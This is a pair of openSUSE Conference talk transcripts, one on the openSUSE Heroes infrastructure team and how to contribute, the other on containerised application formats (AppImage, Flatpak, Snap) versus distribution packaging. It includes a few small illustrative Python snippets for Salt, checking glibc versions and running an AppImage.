openSUSE people have a lot of new things on their minds, and when new people join we have to make the processes simpler and simpler.
So, we have pretty good monitoring now, and it keeps getting better; it is an ongoing effort and it is not going to stop. GitHub, as I mentioned, is something we are using more and more: we want to have the relevant repositories for the infrastructure there, and, after the configuration management discussion, for Salt as well. I am not going to go through every single service; instead let me go through the questions I get from a lot of people, starting with: how can I contribute to the infrastructure? I have about another fifteen minutes, so there is some time for this. First of all, the machines are managed with Salt, so one way to help is with the Salt states and formulas. We also have a packaging policy: when packages are not in the distribution, the rule is that they get cleaned up, submitted to our repository and then to the next Leap, so that in the end we can install them straight from the distribution. The third piece is the monitoring of our infrastructure, because that is what sends us notifications when something is wrong; we have the GitHub repository I mentioned, and there is an agent on every machine that reports its state back to the monitoring. The next question I usually get is how many people are on the team, and the honest answer is: I do not know exactly; we are quite a few, and we are still not enough, so please join us. The next question is whether somebody from outside can look at, or help with, the infrastructure, and the answer is of course yes. We do not have a formal process; there are a few policies, and you basically need to do a couple of things to reach us. Let me make that a bit more concrete: how do I reach the team, how do I get involved? There is the IRC channel, where you can reach us directly, and there are wiki pages that are there for your reference, where you will find the documentation you need for the administration of the services. You will need credentials if you want to get access or do actual administration work, obviously. A few things you have to take care of yourself, like your own account and key, which you then send to us; once that is done you are basically ready to go. And one more thing: we need somebody who knows Ruby on Rails and wants to give MirrorPinky some love. MirrorPinky is the interface for our mirrors: the idea is that the mirror admins can edit their own data, because if they change their IP, or if they change their bandwidth levels, they do not have to send us tickets every time to update the information in our database.
So we need somebody who knows that stack and can help us with MirrorPinky. Beyond that, we simply need help keeping the data in shape, because there is a lot of it and it is not finished. Before I go on to the plans, I should say that while preparing this talk I went back through the talks that have been given about the infrastructure over the years, and I noticed that quite a few of the things we are talking about today already came up in earlier years, so it is nice to finally see some of them happening. Looking forward, we need to migrate more services; the remaining ones have to be moved over to the new environment, and we have to keep improving the monitoring and a lot of the other services I mentioned before. There is one big project coming up: we have to evaluate a CDN provider. That would first be used for the static content only, and if it turns out to work well and be affordable, we will evaluate it for more services afterwards, but that is further down the road. We have also put a proxy in place that sits between some of our machines and the internet, which was set up in a very short time; it is not in front of all services yet, and we want to extend that to get more protection for the infrastructure. Meanwhile, there is GitHub, which I already mentioned. What we really need is more support from the community on the Salt side, especially with the formulas; Salt is a very nice tool, we have converted part of the setup and there is a lot more to do. In the longer term the goal is to make the whole setup more consistent and more resilient, so that the work does not depend on individual people.
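Because Salt keeps coming up as the place where help is most welcome, here is a minimal, hedged sketch of how a Salt-managed setup like the one described above can be driven from Python. It assumes a salt-master with connected minions and sufficient privileges; the minion id and the "motd" state name are illustrative placeholders, not real openSUSE Heroes machines or formulas.

```python
# Minimal sketch using Salt's Python client API; run on the salt-master.
# The target and the state name are illustrative placeholders.
import salt.client

local = salt.client.LocalClient()

# Check which managed machines currently respond
print(local.cmd("*", "test.ping"))

# Apply a hypothetical "motd" state to a single machine
print(local.cmd("minion1.example.org", "state.apply", ["motd"]))
```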
Of course, another goal we have is to make the whole setup easier to work with: we want to organise things in a way that everybody can pick up, so that services are not tied to individual admins. We also want more transparency towards the community, and one specific idea we had was to put NTP servers under an open source domain into the public pool. If you have more ideas, we are around and you can help us; you can also bring us new tickets or new ideas here at the conference, or suggestions for the next year. That is mostly all I wanted to say. Now I would like to remind you that this is the openSUSE Heroes team: come by for a chat, come by for a beer, we are available twenty-four seven, except when the admins are asleep, and we would love for you to join us. Are there any questions? Yes, please. I had a look at the list of open tasks, but for people who look at that list and who are not admins, how can they get going? Well, it is true that a lot of the things on that list are things that need experience. But honestly, there are things that mainly need experience, and there are things that mainly need a lot of time, and those are the ones we would love to hand over. We cannot hand out root access to everything, or to certain services, but time is the real bottleneck, not permissions. There are things you can do to help the infrastructure without any special access at all; for example, you can help us with the Salt formulas. That is a topic I should have given more time in the talk: whenever something is not covered yet, the answer is going to be Salt formulas again. So if somebody wants to help there, that basically needs no special privileges, and it is a really important project, because once it is finished it covers a large part of the setup. I think Christian wants to say something about the wiki, right? Yes, I have an announcement to make. We have been planning to upgrade the wiki for quite a long time, and I have some homework for you: point your browser at en.test.opensuse.org and have a look at what our new wiki looks like. It is not only a newer wiki, we also have some new extensions. There was also a question about the wiki and GitHub and where the documentation should live, and a few more technical details, but the short version is: go and try the new wiki and tell us what you find.
Yes, and one more thing, also about the forum: if you find something that is broken, the easiest way is to report the problem so that it reaches the admins, which means writing to admin at opensuse.org. Thank you for that; yes, it is admin at opensuse.org. Are there any other questions? Yes, one about the mirrors. The mirror infrastructure itself is mostly in good shape; the issue is that we have gaps in regions like APAC, and the statistics give us a rough idea of where mirrors are missing in different parts of the world. The mirror situation is also something that will get a lot better once we have the CDN provider I mentioned. The gaps that exist are gaps we know about. For the distribution of the downloads we have the main download infrastructure, and plenty of openSUSE mirrors here in Europe; the hosting we run ourselves right now is mostly in the U.S., not in Europe, but in Europe the mirror coverage is much better, and it will improve further with the CDN. Especially for APAC, like Australia and Asia, there are simply not many mirrors, and that depends a lot on the community there; it should get better with the CDN I talked about. There was also a question about how to estimate that; it is not that hard to calculate, because we do have the numbers for it. Okay. Thank you. Thank you.
The openSUSE Infrastructure Once again, the team behind the administration, support and maintenance of the openSUSE infrastructure is here to present services, machines and people, and all of the improvements after the renaming of the team on oSC16.
10.5446/54461 (DOI)
Wow. Thanks everybody for coming. It's like the last, well, second to last talk for me. After this, we've got the board meeting in the main hall and then we're done. So I'm Richard. I'm here to talk about, well, dinosaurs or, as most other people know them, containerized applications and how we need to deal with them. Now they're out there. Now users are really using them. Now we're starting to see the problems with them in the real world. And this is a variation on a talk I did at FOSDEM earlier in the year. So I'm going to start out rehashing a lot of that. So if you've seen my talk, I'll try and run through it a little bit quicker. And if you haven't and you're more interested, you can go back and watch that. And then I'll talk about some of the new and exciting stuff and why I had to rewrite my slides twice during this conference. But really, when I started looking at these technologies, looking at Snappy, looking at Flatpak and looking at AppImage, it struck me that I'd seen all of this before. And in fact, where I first sort of saw similarities was actually back in sort of the Windows architecture, the original Windows application architecture and how Windows deals with loading up libraries and dependencies in the Windows world. And I mean, to start off with, look at it from another perspective: traditional Linux packaging has an awful lot in common with Windows 3.1. It's a similar world. There is no ABI backwards compatibility. Things are constantly changing. Things are constantly evolving. There's one great big file system where everything is dumped into C:\Windows or C:\Windows\System, global identifiers for all the symbols, so everything starts clashing all over the place. It's an absolute maintenance nightmare. And it's where the term DLL hell comes from. Because ultimately, all developers want to do is have a nice, well, simple environment to work with. And in the Windows 3.1 world, they had to develop and test every single possible DLL combination that might be seen in the wild possibly anywhere. And then every time they had a patch, test that patch in every single combination everywhere. And then when there was a dependency or library patch, test everything in every single combination everywhere. And they would do that, and they would try, and Windows was being used everywhere, and then they'd cry because it would all break anyway and it would all go horribly, horribly wrong. And Microsoft thought they could fix this. And they tried very, very hard to do that. And they were somewhat successful. Now, Windows 2000 introduced this concept of side-by-side assembly, which is basically containerization or application isolation for the Windows world. Having a separate memory space for every single application and all of its DLLs, loading up those DLLs privately from a folder in the file system, having Windows File Protection, doing disk isolation of system DLLs, and having these fancy tools to audit all of that and migrate those legacy applications and deal with those problems. And you ended up with this wonderful situation, if you're a Windows user, where your Windows 2000 or later could run an application for Win32 or even for POSIX or even OS/2, using these fancy little runtimes that were packaged up in that Windows environment. So, problem solved, right? Well, no, of course, it all went horribly wrong. And not just because it was Microsoft doing it.
There were very, very real sort of social and practical problems that evolved over time that we all saw. It was a security nightmare. All of these libraries, all of these dependencies end up lurking in countless folders, all being maintained to various degrees by the developers that put them there, all then becoming lovely security vulnerabilities, security gaps, attack surfaces for things like WannaCry and other malware to go and abuse and misuse when certain applications are loaded in memory and loading up the bad DLLs in question. It's also a maintenance nightmare as a user. How do you then update that application on the user's machine? Anyone using Windows, how many application updaters do you have in your system tray? I mean, everyone bundles another updater. And it just doesn't scale. It ends up, especially in the open source world, being a bit of a legal nightmare; one of the biggest issues of getting open source software in Windows is actually this problem. It's actually figuring out, okay, can we put this open source DLL in this container with everything else we need to put in there to get the thing working? And, in the case of the Windows world, with these DLL-bundled applications, the developer is the distributor. They have to worry about those legal issues and those legal concerns. But there is one bunch of people happy, hard disk vendors, because everybody's using up more disk space. People need more bytes. It's not terrible. And this was, yeah, like I said, since 2000. Meanwhile in Linux land, we were looking on smugly because we'd already solved all these problems. Sort of. And the way we solved these problems was with the traditional Linux distribution. And primarily, the things that distributions brought to the table and still bring to the table today isn't the technical stuff per se. We all solve the technical problems in our own way. We all have our different package managers and our different philosophies on how you should do this engineering and packaging stuff. But the universal thing we all really bring to the table is we care about the security of the operating system and its applications in the context of a user looking after it. We're maintaining this stuff. We're auditing this stuff. We're constantly monitoring CVEs, pushing out these updates. And especially with the open source side of things, a major security vulnerability needs to be handled in a very particular way. You're going to have embargoed security mailing lists. You need to have trusted people on there. So you need to have the right people there. You need to have the right relationships there to get on those embargoed lists. And distributions play that key role of being there and able to get those fixes out before issues start hitting your code tree. And like I said, maintaining it, packaging those updates, keeping them updated, dealing with upstreams, helping work with upstreams with that. And lawyers auditing all of this stuff, checking it's compatible, making sure that the licenses being chosen are sane and consistent with each other. So when I talk about this distribution stuff, you know, lots of people (and it's kind of spawned by these new technologies, this kind of resurgence of the bundled application side of things) say shared libraries are a problem, we're trying to solve the shared library problem, dependencies are a pain in the ass, I don't want to worry about the dependencies, I just want to worry about my app. Shared libraries do solve real problems.
It's not just a case of being more efficient on disk, although that is a benefit as well. But having fewer libraries to worry about, having fewer dependencies to worry about, or having fewer repeating copies of the same dependency to worry about is a very beneficial thing. You know, when something goes wrong, when something is insecure, you have fewer copies of that thing to worry about. You have fewer places to patch. You have less manpower required to patch it. Less double work sending multiple copies of your vulnerable libssl out there or your vulnerable Samba libraries out there. And that makes it easier to then review it both as a user and as a distributor or as a developer who is distributing, and ensuring that legal and security compliance, you know, this is something you can trust and rely on today, tomorrow. And also when it stops being maintained, it's still doing it in a way that's, you know, at least sane at the time it stopped. So from the open source sort of distribution side of things, mission accomplished, right? Well, no. Like I already said, the open source distribution way of doing things was very similar to actually how Windows did it. You know, we still had these problems. We still had the issues of compatibility, of making sure all these bits and pieces work together, of, you know, portability. How does an application built in one context work elsewhere? And how do you handle this issue of keeping something, keeping this software being delivered and just working, and handling the fact that the open source world, and therefore everything you're distributing, is moving at a constantly changing pace of change. But we're not Windows. And when you're distributing in the open source world, there's different factors at play. So thinking about the compatibility issue, we all end up doing different distributions. We all end up having different libraries and different applications. Different applications require different libraries, so the problem becomes exponentially complicated. And application developers don't want to worry about all that mess. They just want to deliver their software into the hands of users. I get it. They don't want to have to worry about which choice of dependencies certain distributions picked. But most of the time they don't have to. In reality, distributions have their own maintainers. We have our own communities, all here, who care about this stuff and this part of it, and are the sort of second tier making sure that the application gets in the hands of users. And you care about it in the same way as the upstream maintainers care about it. So very rarely does it really become a problem, because most times it is really being done by the distro maintainers who care about this. And that's what you all do and that's what we've been doing for years and we're bloody good at it. As you can just see in Tumbleweed, where we repeatedly ship stuff as fast as the upstreams are shipping it. But it is unportable. It's openSUSE, by openSUSE, for openSUSE. And an application developer wants to make sure that their software runs in as many different contexts as possible and as many different distributions as possible. And they don't want to learn a whole bunch of different build tools and they don't want to learn 20 different ways of doing things and they don't want to retest it in 20 different places. But again, distribution communities often take care of that problem for the application developers anyway. And then pace of change.
Every distribution does everything at a different pace. Heck, if you're openSUSE, we do it at two different paces. With Leap, we do it regularly every year, with major versions every few years, and we do Tumbleweed, where we just go nuts, as fast as every upstream wants us to go. But in the traditional old fashioned way of doing things, the regular release process gets in the way of that application delivery desire. In the traditional model you can't necessarily run the latest version of software on your stable openSUSE or your Debian system. Debian in particular is the perfect example because they freeze so well and so hard and so solidly that that becomes even harder, and they're proud of that. Leap, we purposefully design it in a way to try and bend the issue around the edges and deliver faster stuff when we can, how we can. We have the build servers, we have openQA to help with that. But it's still a very real problem. Sometimes we just have to say no because the technology can't do it. But that problem, that balance, how do we deliver this software? That is again something that distributions do currently take care of. So how much of a problem is it really? Doesn't matter. AppImage, Flatpaks and Snaps are here to solve all the problems left anyway. And they exist to solve that issue. They exist to try and move these problems out of the hands of the distributions, or reduce the need for the distributions to do this. So application developers can get that software in the hands of users at the pace the application developers want to be. And they do so by providing a bundle containing the app and the libraries, all the dependencies they need, in then some kind of container or context or bubble or whatever. I'm going to keep on saying container, although technically speaking, you know, that's open for interpretation. And the big promise of all these technologies, despite details around the edges of how they do things, is to solve all these compatibility and portability issues. It's only going to have the compatible libraries in the bundle. So you don't have to worry about anything from the distribution. You just put your application there, everything you need, you know. It will be portable. It will work everywhere because all the dependencies will be solved in there. You'll never have to worry about what does a distribution ship. And of course that means you can ship it at the pace you want, whenever, however, don't have to worry about what the distribution is doing. And it's just going to work. And it's going to be wonderful. That's the promise. And then you have nice architecture diagrams like the Snappy one here, or you have really stupidly complicated architecture diagrams like the Flatpak one, where you have this kind of model of, you know, just ignoring the operating system down the bottom pretty much. It's just there. And then there is some layer on top of that, be it the frameworks or the runtimes, which, you know, provide this sort of layer of dependencies, which are an awful lot like the dependencies the distributions are currently doing anyway. And then the bundle itself contains the library, the code, the application, everything's fine. But it doesn't work. In practice, it doesn't work. Most of the time it does, but there are still some very, very real issues there. And in fact, the biggest problem that comes around in reality when you start using these in production is this issue of, you know, compatibility and portability. The myth is not true.
Because at some point, be it AppImage, Flatpak or Snappy, there are some assumptions made about the stuff below the system. And we talked about this. Like, you know, in the case of Snaps, you know, that is still the kernel. You know, everything above the kernel is assumed to be delivered by some Snap somehow. But no kernel is equal. You know, every distribution has a different kernel with different configs. There's still problems there that get introduced by different, you know, by different kernel arrangements. We see this in openSUSE most actually with Steam, which isn't using one of these technologies, but basically uses the same approach of having a containerized Steam, you know, runtime that gets put in your user area and run that way. And everything was fine on openSUSE with Steam for the longest time. It just worked. It did its job. We could move everything in openSUSE and everything was fine. And then we changed our glibc and it exploded spectacularly, because their Steam runtime was built with an older glibc and therefore nothing would run anymore. All those libraries would go horribly, horribly wrong, until we started scripting around injecting our glibc into there and rebuilding everything. And it was a complete mess. And we've seen this issue with Flatpaks. We've seen this issue with some of the experience with Snaps. We've seen the issue sometimes with AppImages. But one of the nice things, and one of the reasons why I've always come into this liking AppImage, is at least AppImage documents this problem. You know, it's stated there that it isn't trying to be a universal portable application solution. You're going to have to gather the binaries for the dependencies for the distributions you're targeting. You're not going to magically solve this problem everywhere. But that means that if you're using these technologies, you still have to worry about all of the compatible dependencies which might not be provided by any distribution you might want to run it on. That's a lot of stuff to worry about. Heck, that's the stuff that we all do at openSUSE all the damn time and it takes all of us to do it. If you don't get your head around that, your users need to expect crashes. So is it hopeful? Is it hopeless? You know, well, you know, you talk to Flatpak people like this: oh, no, we've solved it, you know, we've got these runtimes. Or on the Snap side of things, you know, we've got these base snaps. Well, those base snaps, those runtimes just end up being some second curated middle distro. It's middleware for the containerized world. Cool, fine. But you haven't solved the problem. You've just moved it into a different context. It's still another distribution. You're still having to have distribution engineers worry about this stuff and curate it and secure it and patch it and maintain it. Maybe it isn't a real solution. Maybe a real solution is actually figuring out a way of commonly agreeing between us, the distributions as a platform, the application runtimes as a delivery mechanism, and hopefully even the developers, on common, I use the word standards here, but let's say common agreements of, you know, what can you expect from your base system? What can application developers expect from their runtimes? So people can go into this and we won't just have random crashes when you install your AppImage or your Snap on an openSUSE machine and it doesn't deliver the kernel the way it's expected or the libraries the way they're expected.
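As a concrete illustration of the glibc mismatch described above (nothing shown in the talk itself, just a hedged sketch): the script below compares the highest GLIBC_x.y symbol version a bundled binary requires with the glibc available on the host. The binary path is a placeholder, and it assumes binutils' objdump and glibc's ldd are installed.

```python
# Hedged sketch: does this bundled binary's glibc requirement fit the host?
# Assumes objdump (binutils) and ldd (glibc) are available on the system.
import re
import subprocess

def required_glibc(binary):
    """Highest GLIBC_x.y version referenced by the binary's dynamic symbols."""
    out = subprocess.run(["objdump", "-T", binary],
                         capture_output=True, text=True, check=True).stdout
    versions = {tuple(int(p) for p in m.group(1).split("."))
                for m in re.finditer(r"GLIBC_(\d+(?:\.\d+)+)", out)}
    return max(versions) if versions else None

def system_glibc():
    """Version of the glibc installed on the running system."""
    out = subprocess.run(["ldd", "--version"],
                         capture_output=True, text=True, check=True).stdout
    return tuple(int(p) for p in re.search(r"(\d+\.\d+)", out).group(1).split("."))

binary = "/opt/some-bundle/bin/app"   # placeholder path to a bundled binary
need, have = required_glibc(binary), system_glibc()
print(f"binary needs GLIBC {need}, system provides {have}")
if need and need > have:
    print("this bundle will not run here unless it ships its own glibc")
```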
And until we do that, the compatibility problem isn't really going to be solved. The portability problem isn't really going to be solved. But what about pace of change? And, you know, well, yeah, what about it just working? Well, back to the Windows side of things. This is what Windows did. This is very, very similar to what these technologies are doing as well. Is history just repeating itself? Because when you're delivering these libraries in there, it's going to be a security nightmare. Maybe not in a practical sense, you know, because we are talking about putting this stuff in jails and, you know, some kind of isolation. But to be honest, when it comes to these, you know, these bits of isolation, it's a firewall. And I don't like the idea of trusting a firewall with my system security. I like a firewall being there when everything goes wrong and it's my last line of defense, but it's not my first line of defense. I want sensible engineering as my first line of defense. And therefore, I kind of forget about the isolation entirely and want to make sure that someone is taking care of the security of the libraries in my bundle, and assume that at some point someone's going to escape the jail. There's no answer for that right now. There's no clean answer for that right now. Or there wasn't a week ago. Same with the maintenance side of things. Who's going to be patching these libraries in there? Who's going to be making sure that those libraries are moving forward? Who's going to be making sure that what I've installed is actually legally allowed to be on my machine? Who's going to make sure that the GPL is correctly being used and cited in there, with my LGPL stuff, for example? But it's okay. Storage vendors are still going to be happy because all these bundles are going to be using up more disk space. And then this is where my slide deck starts going out of kilter, because I was going to then talk about how we need to start conveying these responsibilities to the various maintainers of AppImage and Flatpak and Snappy, and start talking about how are we going to get this message out there. And I was going to be talking about considering ABI changes and how do you rebuild bundles when ABI changes happen. And I was going to be talking about testing all of that. And I was going to be talking about the security maintenance issues. And I was going to ask the question about, you know, what are we going to do? And I was going to suggest a few things as well. But it all went horribly, horribly wrong because of the openSUSE Conference. It's all changed. My question no longer is what are we going to do? It's actually what has been done already. And, well, I was going to change the title of this talk because, you know, from being a real big skeptic of all these technologies, from what's been done, I now love AppImage. I really love AppImage. Because, well, OBS now builds AppImages. Our build service now can take the packages that we have in there for Tumbleweed, for Leap and for everything else, even our devel projects, and build AppImages from that. So all those problems about the sort of security compliance, the security auditing, license tracking, dependency tracking, figuring out how to rebuild stuff, when to rebuild stuff, all these problems that we'd already solved in the distribution space, the AppImage guys, by working with us, have now solved it in the AppImage space as well. And, you know, we can host them on the build service too.
So we have even, you know, changed the context of how you can deliver the software to the users. And we've managed, you know, the OBS team has managed to do all of this without impeding AppImage's strengths and flexibility of just being a nice, easy, lightweight way of getting this thing into the hands of users. It just gets there. It's easy to deploy, you know, single click run, it unpacks, it runs. This is really exciting. This totally changes my outlook on all these technologies, because suddenly I don't have to be a skeptic anymore. I trust the build service, I trust the tools we have there, I trust the processes we have there. And it makes both sides of the equation more interesting to me. Just a few ideas that are kind of bouncing around my head since I heard about this two days ago. I want to see if we can do something like openSUSE Leap with AppImages, with user space applications being built from the Tumbleweed sources. Because the build service can do that. We can build Tumbleweed sources for Leap. We can wrap that up in an AppImage. Last year I had this long one hour ranty talk about how I hated devel projects. Now we can kill them, in the sense of killing the publishing of them; we still need them for building stuff for Tumbleweed. But if we do this, users will be able to hopefully get the latest version of LibreOffice on their Leap machine without having to change everything on their Leap machine. That's really cool. We announced earlier this week openSUSE Kubic, which is currently very much targeted for the Docker and Kubernetes world, a very, very stable atomic file system, atomic distribution with transactional updates on the base system. Well, now we have this. If we shove a graphical environment on there, maybe a nice tightly polished one, something like GNOME, and do all of the user applications with this, suddenly there's an option of an openSUSE Chrome OS style thing, a nice simple appliance for your grandma, which is something, well, when someone talked to me about that just last week, I said, yeah, good luck, have fun. It's crazy. It would take tons of people, tons of hours, and it's never going to happen. Now I can see one or two maintainers taking what we do in the build service and taking what the AppImage guys have done with us, and being able to knock that out in a couple of weeks. That is awesome. Admittedly, I'm not going to use it, but it's awesome if someone wants to take and use it. There was a talk today about Package Hub and all the stuff we're doing in Package Hub. Hopefully no one from SUSE sees this part. I have a bit of a mixed opinion of Package Hub, because it's really exciting me that we're delivering openSUSE packages to enterprise customers, but at the same time, the way we're doing it is really similar to how Tumbleweed back three years ago used to be, where SLE is a really nice stable base and we keep on putting new versions of everything into Package Hub, rolling along the top of that. With old Tumbleweed, we learned eventually that gets too big and too unwieldy and it starts getting a little bit breaky. It hasn't had that problem with Package Hub yet, but that's a risk if Package Hub just keeps on ballooning. For the user space applications, at least, the desktop applications, this AppImage stuff gives us an easy way of insulating that problem. We can actually define the scope a little bit better, start using the AppImages there, maybe start delivering AppImages to SLE via Package Hub.
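To make the "single click run" point above concrete, here is a tiny, hedged sketch of the user-side workflow for an AppImage: download it, mark it executable, run it. The URL and file names are made-up placeholders, not real openSUSE or OBS download locations.

```python
# Hedged sketch of deploying an AppImage: no installation, no root needed.
# The URL and paths are illustrative placeholders.
import os
import stat
import subprocess
import urllib.request

url = "https://example.org/downloads/MyEditor-x86_64.AppImage"  # placeholder
target = os.path.expanduser("~/Applications/MyEditor.AppImage")

os.makedirs(os.path.dirname(target), exist_ok=True)
urllib.request.urlretrieve(url, target)

# Mark it executable, then simply run it
os.chmod(target, os.stat(target).st_mode | stat.S_IXUSR)
subprocess.run([target], check=False)
```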
It solves the same problem, does it in a slightly more sane way, and uses these technologies to solve real problems that we would otherwise run headlong into. But I'm not finished, because this is just AppImage. I was thinking, what's left? Well, Snappy, Flatpak, sorry. With this now, you're not just part of the equation, you're behind. AppImage now has a better build story than you do. They've got a stronger compliance story than you do, and they've got a more straightforward user experience in different distributions than you do, because you still haven't got Snappy in Tumbleweed. Even if you ignore the technical stuff and you want to argue the details with me, they're kicking your ass when it comes to working with others, because it's not just the fact that you're both here, it's the tone, it's the style, it's the way they've really got their hands dirty and messed around with the build service. Please be more like AppImage. It's been so fun working with them and seeing them change my mind and seeing us change their mind a little bit about a few things. We've got the tools, we've got the talent. Please work with us, because I think we can do really exciting things in this space. But it's going to need to work in the kind of way that these guys already are working with us, because it's just really exciting doing it that way. And it's not all good news, or it's not all bad news for you. There are still problems across the entire thing. Dependency hell is still on the horizon. All of these tools still have very limited or no way of really solving this issue of what's coming from the base system. There's still assumptions being made there. We need to get together. These tools need to get together, the distributions need to get together. And we need to discuss common standards and design common standards so everybody can go into this equation with simple ideas of what's going on there. Without that common understanding, application developers will just find frustration, and users will just find crashed stuff, and distributions will just keep on doing what they're doing in the context they're doing it. And then we'll actually miss out on cool opportunities to use this stuff in the way like I was talking about. And security, sandboxing, the app isolation side of things is a complete mess right now. Everybody has cool ideas and no one's finished implementing anything. The AppImage side of things, well, I kind of understand that, because they've gone into this with the approach of use Firejail or whatever the hell you want. That's cool. But "whatever the hell you want" needs to be a little more defined than that. snapd obviously has the AppArmor side of things. We love AppArmor, but your patches aren't upstream yet. And I know, "yet", that's cool, you're fixing that. But let's get that done. Let's get that in. Because if I had my way, I'd like to see AppArmor kind of become the single way of doing this. I think it makes more sense. I understand AppArmor more than I can understand Bubblewrap and what they're trying to do there. I think that Bubblewrap stuff is a little bit too desktop application oriented, which is cool for desktop applications, but there's scope here for using this in other wonderful ways, in IoT and stuff. So let's see what we can do about getting AppArmor in there, polished up, do it all the way. And with that, I just want to kind of say thank you.
I mean, this is becoming a really good lesson for me: two months ago I was screaming that I thought the world was ending and this would never work out all right. And I've become a convert. I want to help make this better now. So let's just get on to it, and does anybody have any questions? Anybody? Go on then. Obviously. I was hoping you did. So I'm curious about the security and licensing compliance you mentioned. So you say you have an AppImage built on OBS. What does actually check that maybe that AppImage is built from a Git tree somewhere else, that you're still compliant, that the Git tree does not contain stuff under a different and incompatible license, and it doesn't contain a bundled copy of a library that has security vulnerabilities? You're technically right. I mean, yeah, if someone's taking an OBS project, a random home OBS project, and building AppImages from that, there's no magic license solution there. But like we were talking about earlier this week, like my other talk from Friday, if you look at what we're doing with Tumbleweed, you've got a pool of software in Tumbleweed where we are keeping up with upstreams. Heck, we were just about to publish a new GCC 7 version that we did while we were here. The pace of change in Tumbleweed is fine. So you've got this huge pool that is audited, that is there, that is done, that's keeping up with upstreams. So if you're building your AppImage based on Tumbleweed packages, you've just got to worry then about your tiny little diff, your little part there, which means all of the other dependencies you're feeding into that, they've been audited, they've been checked, they work in the sense of Tumbleweed, done. Completely agree, and Snaps have exactly the same thing with the build snap. I talked about it. Yeah, but you're doing exactly the same thing with Ubuntu and only Ubuntu. Well, it's still, we're doing it exactly the same as you do. Yeah, but with the build service way, you can do it with everything I just said with Tumbleweed and you can do it with Ubuntu and you can do it with that. And we're going to get there. Yeah, but you can do that your way, or you can just copy what they did with the build service. No, because the problems are not like that. The problems are technical, below the stack. And it's not a problem of building; you can build it, you just can't run it yet. Once we get to the running, you can build it on top of anything and run it. And that's fine. So we have the same goal here. There's no disagreement. Okay, I'll believe it when I see it. Any more comments? Questions? Cool. So there's two issues actually I don't really see solved yet. So first of all, you still end up with a certain amount of size, right? Yeah, because you need redundancy. And of course, one thing that always concerns me is the laziness of developers, because they start to rely on compatibility or outdated libraries. So especially if you have something large like, say, framework X, which depends on a lot of libraries, then you have a large footprint which becomes outdated. Now, I don't want that to happen with stuff like an OpenSSL, for example. What do you think about that? It's a perfectly fair point. It's a perfectly fair problem. And the answers are exactly... I don't see that problem any different in the containerized application context than I do in the distribution one, actually. We suffer that same pain.
I'm kind of hoping that getting distributions around the table, distributions and projects around the table, and the kind of common framework idea that we're sort of coalescing around, might give a little bit of a push to help drive that problem away a little bit. Just like it did with KDE, and Leap needing an LTS release, and KDE making a commitment to that. That's how they're going to do that and solve that problem for us. Yeah, it's a very real problem. We never really solved it on the dependency, on the distribution side of things on our own. This actually makes it potentially a little bit more... It gives us a second chance to do it right this time, hopefully. There's a question there. Yeah, if I will be a developer of... I still feel that Android kicks our ass, because it's so much easier to develop for Android. And they have the same problem. They have, let's call it distributors, which is actually hardware vendors that provide their phones. And they have some stable base, which is versioned Android. And yeah, of course they have problems with security and such stuff, but I still feel that from a developer point of view, it's much easier to develop for Android than any app images. Why? What's the difference there? Because ultimately, an Android app is just a bundle of a whole bunch of dependencies. It might be easy... How would that be easier, both... The question I've got to get to you then is, how is that easier, both getting the application there in the first place and then how is it easier maintaining it? Yeah, one part that's easier: they have a common base. They can easily... It's backward, somehow backward compatible. And you can say, I support this version of Android or newer. And it keeps working. But yeah, I think finding such a base in Linux, as you mentioned, the Linux Standard Base, is basically missing. And there's a lot... Much more stuff in Android that's common than in Linux, which is... Yeah, that's because you have to bundle much more in Linux than on Android. Yeah, I can't argue with that part. That's why I think we need this. Because I think the problem with the Linux Standard Base is the scope was too broad. It always was, trying to define everything at every level of every bit of the stack. The nice thing with these technologies is they push that problem down to a certain amount. I mean, Snap tries to push it down to the kernel. AppImage tries to push it down quite low as well. Flatpak keeps on changing its mind, because then the runtimes move the line all over the place. But at least the line tries to get defined further down the stack. So if we just figure out where that line is and define a common base below there, common... Let's say if the line gets drawn near the kernel, basically common standard configs of the kernel. What config is likely to be there? What is an LTS... Are we going to follow the upstream LTS kernel and move along at that kind of pace? Just so you can tag that with a version and say, okay, I'm supporting container base version blah, and then you get that solution. You get that situation you have with Android. I think we need that in the Linux containerized app side of things as well, totally. Yeah, and another part that sucks for me as a developer is that we don't have a common place where to distribute such stuff. They have the Android store, however they call it, and you just upload it there and you are fine. Every Android user, even if it's from a different distribution, is already having it. And we still miss it in Linux for many years. Yeah, I...
Given the nature of the open-source world, I don't think you will have a single place. I mean, you might have a dominant place because someone's going to win the popularity war, but whether it will be a single one... I mean, even Snap has multiple store options already. OBS is now another one for AppImage. There will be fragmentation there. I'd love to see a way of pulling it all together somehow, because I think that will help in the long run. But that's a problem for the future, I think. Yeah, something we have to worry about, definitely. Yeah, so what I want to say is that we are still behind Android. We're still behind Android. No doubt about that. From a developer point of view. And I think from a user point of view it's also behind Android. And that's something that I... That's a drum I think I'll keep on beating, because I think if we can get a bit more commonality between these different tool sets, it makes it a little bit easier to catch up with where Android is. It also makes it a little bit easier, to be honest, and that's kind of the motivation behind this: I can see how this makes distributions' lives easier, less stuff, less to maintain. And we're all lazy. So I can see how we can actually use this to change everything in a rather nice way. But it's only going to work if we kind of find ways of applying focus to that and coming up with some common standards and then seeing how the technologies actually shake out in the long run. Cool. Any more questions? No? Okay then. Thank you very much.
Containerised Application technologies like AppImage, Snappy and Flatpak promise a brave new world for Linux applications, free from the worries of shared libraries and dependency issues. Just one problem, this is a road long travelled before, such as in the application dark ages of Win32 applications and DLLs. And it worked out so wonderfully there... Do we risk a future where, like the resurrected dinosaurs of Jurassic Park, this family of applications will break their containment and start eating our users? This session will try to present a fair argument about the situation, frankly discussing the benefits promised by these technologies, but highlighting the very real issues and risks their widespread adoption could, and in some cases are, already bringing to the table. The talk will cover the promised benefits of application containers, such as AppImage, Snappy and Flatpak. It will detail the empowerment of developers who use the technologies, the ability for upstream projects to have a much closer role in delivering their software, and the benefits that brings to both the upstream projects and their users. But as a counter to those benefits, the session will detail some of the risks and responsibilities that come with that technology. The complexities of library integration, the risk of introducing new forms of dependency issues, and the transference of responsibility for those issues, plus security, away from the current Distributions delivering upstream projects towards those upstream projects directly. As a conclusion, the session will start to ask the question, what the hell should openSUSE do about this mess? How much can we help fix it or mitigate the problems? How much do we want to be involved in that new world?
10.5446/54462 (DOI)
